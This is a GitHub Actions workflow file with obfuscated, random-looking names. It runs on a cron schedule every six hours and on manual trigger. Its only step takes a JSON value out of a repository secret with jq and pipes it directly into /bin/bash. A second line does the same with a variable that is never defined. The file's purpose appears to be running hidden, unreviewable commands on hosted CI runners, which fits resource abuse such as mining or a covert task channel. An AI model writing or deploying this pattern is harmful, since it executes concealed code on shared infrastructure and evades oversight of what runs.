name: suguimi4356

on:
  workflow_dispatch:
  schedule:
    - cron: '19 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: suguimi4356
        env:
          emil91442: ${{ secrets.emil91442 }}
        run: |
          echo $emil91442 | jq -r .gsve1 | /bin/bash
          echo $i63 | jq -r .jt33407 | /bin/bash

